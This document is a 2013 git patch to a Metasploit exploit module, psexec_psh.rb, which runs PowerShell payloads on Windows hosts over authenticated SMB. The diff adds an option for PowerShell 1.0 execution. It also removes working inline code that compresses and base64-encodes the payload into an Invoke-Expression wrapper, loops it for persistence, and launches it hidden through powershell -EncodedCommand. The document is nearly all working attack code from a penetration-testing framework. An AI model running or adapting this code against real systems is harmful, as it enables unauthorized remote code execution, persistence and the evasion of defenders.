From 6ba85d4c06613e182707fa3a5e42e8bcad9baac3 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Wed, 30 Jan 2013 12:38:53 -0500
Subject: [PATCH] add libs from #1379 and allow psh 1.0 exec against older
 hosts

---
 modules/exploits/windows/smb/psexec_psh.rb | 84 ++++++----------------
 1 file changed, 20 insertions(+), 64 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index a1dc9261d1..61da9c8599 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,16 +1,19 @@
 # -*- coding: binary -*-
+#!/usr/bin/env ruby
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
     Rank = ManualRanking
 
+	# Exploit mixins should be called first
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB
   include Msf::Exploit::Remote::SMB::Authenticated
+  include Msf::Exploit::Powershell
   include Msf::Auxiliary::Report
   include Msf::Exploit::EXE
 
-
 	# Aliases for common classes
 	SIMPLE = Rex::Proto::SMB::SimpleClient
 	XCEPT  = Rex::Proto::SMB::Exceptions
@@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
               'Execute powershell in 32bit compatibility mode, payloads need native arch',
               false
       ]),
+      OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
     ], self.class)
 	end
 
 
-	def exploit
-		# Build the script
-		command = prep_psh_payload
+  def exploit
+    command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
 
-	    	# Try and authenticate with given credentials
+		#Try and authenticate with given credentials
 		if connect
-	    		begin
+			begin
 				smb_login
 			rescue StandardError => autherror
 				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
 				return
-		    	end
-		    	# Execute the powershell command
-	    		begin
-		    		print_status("#{peer} - Executing the payload...")
-		    		return psexec(command)
-	    		rescue StandardError => exec_command_error
-		    		print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
-		    		return false
-		    	end
-		    	disconnect
+			end
+      # Execute the powershell command
+      begin
+        print_status("#{peer} - Executing the payload...")
+        #vprint_good(command)
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+        return false
+      end
+			disconnect
 		end
 	end
 
@@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		return true
 	end
 
-  # Return a zlib compressed powershell script
-  def compress_script(script_in)
-
-    # Compress using the Deflate algorithm
-    compressed_stream = ::Zlib::Deflate.deflate(script_in,
-      ::Zlib::BEST_COMPRESSION)
-
-    # Base64 encode the compressed file contents
-    encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-    # Build the powershell expression
-    # Decode base64 encoded command and create a stream object
-    psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-    psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-    # Read & delete the first two bytes due to incompatibility with MS
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    psh_expression += "$stream.ReadByte()|Out-Null;"
-    # Uncompress and invoke the expression (execute)
-    psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-    psh_expression += "$(New-Object IO.Compression.DeflateStream("
-    psh_expression += "$stream,"
-    psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-    psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-    # Convert expression to unicode
-    unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-    # Base64 encode the unicode expression
-    encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-    return encoded_expression
-  end
-
   def peer
     return "#{rhost}:#{rport}"
   end
 
-  # Return a command-line payload configured per datastore
-  def prep_psh_payload
-    psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
-    # Run our payload in a while loop
-    if datastore['PERSIST']
-      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-      sleep_time = rand(5)+5
-      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
-    end
-    # Convert to base64 for -encodedcommand execution
-    psh_payload = compress_script(psh_payload)
-    # Determine appropriate architecture
-    ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-    command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
-  end
 end